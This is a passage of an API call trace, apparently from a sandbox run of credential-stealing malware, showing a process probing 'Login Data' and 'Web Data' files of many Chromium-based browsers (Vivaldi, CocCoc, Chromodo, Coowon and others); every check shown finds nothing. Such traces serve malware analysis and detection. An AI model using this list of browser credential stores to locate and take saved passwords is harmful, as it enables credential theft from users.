param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 66 [0145.006] GetProcessHeap () returned 0x690000 [0145.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x88) returned 0x6ac278 [0145.006] GetProcessHeap () returned 0x690000 [0145.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.008] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 0 [0145.008] GetProcessHeap () returned 0x690000 [0145.008] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.008] GetProcessHeap () returned 0x690000 [0145.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.009] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.010] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 74 [0145.010] GetProcessHeap () returned 0x690000 [0145.010] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x98) returned 0x6ac288 [0145.010] GetProcessHeap () returned 0x690000 [0145.011] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.012] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 0 [0145.012] GetProcessHeap () returned 0x690000 [0145.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.013] GetProcessHeap () returned 0x690000 [0145.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.014] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.015] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 79 [0145.015] GetProcessHeap () returned 0x690000 [0145.015] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa2) returned 0x6ac2a0 [0145.015] GetProcessHeap () returned 0x690000 [0145.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.017] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 0 [0145.017] GetProcessHeap () returned 0x690000 [0145.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.017] GetProcessHeap () returned 0x690000 [0145.017] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.018] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.019] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 77 [0145.019] GetProcessHeap () returned 0x690000 [0145.019] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x9e) returned 0x69a458 [0145.019] GetProcessHeap () returned 0x690000 [0145.020] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.021] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 0 [0145.021] GetProcessHeap () returned 0x690000 [0145.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69a458 | out: hHeap=0x690000) returned 1 [0145.021] GetProcessHeap () returned 0x690000 [0145.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.022] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.023] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 60 [0145.023] GetProcessHeap () returned 0x690000 [0145.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7c) returned 0x6ac278 [0145.023] GetProcessHeap () returned 0x690000 [0145.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.024] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 0 [0145.024] GetProcessHeap () returned 0x690000 [0145.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.025] GetProcessHeap () returned 0x690000 [0145.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.029] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.030] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 68 [0145.030] GetProcessHeap () returned 0x690000 [0145.030] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8c) returned 0x6ac288 [0145.030] GetProcessHeap () returned 0x690000 [0145.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.031] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 0 [0145.032] GetProcessHeap () returned 0x690000 [0145.032] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.032] GetProcessHeap () returned 0x690000 [0145.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.033] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.034] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 72 [0145.034] GetProcessHeap () returned 0x690000 [0145.034] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x94) returned 0x6ac2a0 [0145.034] GetProcessHeap () returned 0x690000 [0145.034] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.035] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 0 [0145.036] GetProcessHeap () returned 0x690000 [0145.036] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.036] GetProcessHeap () returned 0x690000 [0145.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.037] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.037] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 70 [0145.038] GetProcessHeap () returned 0x690000 [0145.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x90) returned 0x6ac298 [0145.038] GetProcessHeap () returned 0x690000 [0145.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.039] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 0 [0145.039] GetProcessHeap () returned 0x690000 [0145.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0145.040] GetProcessHeap () returned 0x690000 [0145.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.041] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.042] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 53 [0145.042] GetProcessHeap () returned 0x690000 [0145.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6e) returned 0x6ac278 [0145.042] GetProcessHeap () returned 0x690000 [0145.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.044] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 0 [0145.044] GetProcessHeap () returned 0x690000 [0145.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.044] GetProcessHeap () returned 0x690000 [0145.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.045] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.046] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 61 [0145.046] GetProcessHeap () returned 0x690000 [0145.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7e) returned 0x6ac288 [0145.046] GetProcessHeap () returned 0x690000 [0145.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.048] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 0 [0145.048] GetProcessHeap () returned 0x690000 [0145.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.049] GetProcessHeap () returned 0x690000 [0145.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.050] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.050] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 80 [0145.050] GetProcessHeap () returned 0x690000 [0145.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa4) returned 0x6ac2a0 [0145.051] GetProcessHeap () returned 0x690000 [0145.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.053] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 0 [0145.053] GetProcessHeap () returned 0x690000 [0145.054] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.054] GetProcessHeap () returned 0x690000 [0145.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.055] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.056] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 78 [0145.056] GetProcessHeap () returned 0x690000 [0145.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa0) returned 0x69b0d0 [0145.056] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.057] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 0 [0145.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b0d0 | out: hHeap=0x690000) returned 1 [0145.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.058] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.059] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 61 [0145.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7e) returned 0x6ac278 [0145.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.061] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 0 [0145.061] GetProcessHeap () returned 0x690000 [0145.061] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.061] GetProcessHeap () returned 0x690000 [0145.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.062] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.063] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 69 [0145.063] GetProcessHeap () returned 0x690000 [0145.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8e) returned 0x6ac288 [0145.063] GetProcessHeap () returned 0x690000 [0145.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.065] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 0 [0145.076] GetProcessHeap () returned 0x690000 [0145.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.077] GetProcessHeap () returned 0x690000 [0145.077] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.077] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.078] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 74 [0145.078] GetProcessHeap () returned 0x690000 [0145.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x98) returned 0x6ac2a0 [0145.078] GetProcessHeap () returned 0x690000 [0145.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.080] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 0 [0145.080] GetProcessHeap () returned 0x690000 [0145.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.080] GetProcessHeap () returned 0x690000 [0145.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.081] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.082] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 72 [0145.082] GetProcessHeap () returned 0x690000 [0145.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x94) returned 0x6ac298 [0145.082] GetProcessHeap () returned 0x690000 [0145.082] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.085] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 0 [0145.085] GetProcessHeap () returned 0x690000 [0145.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0145.085] GetProcessHeap () returned 0x690000 [0145.085] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.087] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.088] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 55 [0145.088] GetProcessHeap () returned 0x690000 [0145.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x72) returned 0x6a7af0 [0145.088] GetProcessHeap () returned 0x690000 [0145.089] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.090] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 0 [0145.090] GetProcessHeap () returned 0x690000 [0145.091] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7af0 | out: hHeap=0x690000) returned 1 [0145.091] GetProcessHeap () returned 0x690000 [0145.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.091] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.092] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 63 [0145.092] GetProcessHeap () returned 0x690000 [0145.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6ac288 [0145.092] GetProcessHeap () returned 0x690000 [0145.093] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.094] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 0 [0145.094] GetProcessHeap () returned 0x690000 [0145.095] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.095] GetProcessHeap () returned 0x690000 [0145.095] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.096] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.096] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 78 [0145.096] GetProcessHeap () returned 0x690000 [0145.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa0) returned 0x69b0d0 [0145.096] GetProcessHeap () returned 0x690000 [0145.097] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.099] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 0 [0145.099] GetProcessHeap () returned 0x690000 [0145.099] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b0d0 | out: hHeap=0x690000) returned 1 [0145.099] GetProcessHeap () returned 0x690000 [0145.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.100] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.102] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 76 [0145.102] GetProcessHeap () returned 0x690000 [0145.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x9c) returned 0x69a500 [0145.102] GetProcessHeap () returned 0x690000 [0145.102] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.104] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 0 [0145.104] GetProcessHeap () returned 0x690000 [0145.104] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69a500 | out: hHeap=0x690000) returned 1 [0145.104] GetProcessHeap () returned 0x690000 [0145.104] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.105] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.107] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 59 [0145.107] GetProcessHeap () returned 0x690000 [0145.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6ac278 [0145.107] GetProcessHeap () returned 0x690000 [0145.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.108] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 0 [0145.109] GetProcessHeap () returned 0x690000 [0145.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.109] GetProcessHeap () returned 0x690000 [0145.109] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.110] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.111] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 67 [0145.111] GetProcessHeap () returned 0x690000 [0145.111] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8a) returned 0x6ac288 [0145.111] GetProcessHeap () returned 0x690000 [0145.112] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.113] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 0 [0145.113] GetProcessHeap () returned 0x690000 [0145.113] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0145.157] GetProcessHeap () returned 0x690000 [0145.157] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0145.158] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.159] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 80 [0145.159] GetProcessHeap () returned 0x690000 [0145.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa4) returned 0x6ac2a0 [0145.159] GetProcessHeap () returned 0x690000 [0145.159] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.160] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 0 [0145.161] GetProcessHeap () returned 0x690000 [0145.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0145.161] GetProcessHeap () returned 0x690000 [0145.161] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0145.162] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.163] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 78 [0145.163] GetProcessHeap () returned 0x690000 [0145.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa0) returned 0x69a260 [0145.163] GetProcessHeap () returned 0x690000 [0145.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.165] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 0 [0145.165] GetProcessHeap () returned 0x690000 [0145.165] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69a260 | out: hHeap=0x690000) returned 1 [0145.165] GetProcessHeap () returned 0x690000 [0145.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0145.166] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.167] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 61 [0145.167] GetProcessHeap () returned 0x690000 [0145.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7e) returned 0x6ac278 [0145.167] GetProcessHeap () returned 0x690000 [0145.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0145.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0145.170] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 0 [0145.170] GetProcessHeap () returned 0x690000 [0145.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0145.170] GetProcessHeap () returned 0x690000 [0145.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0145.171] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0145.172] 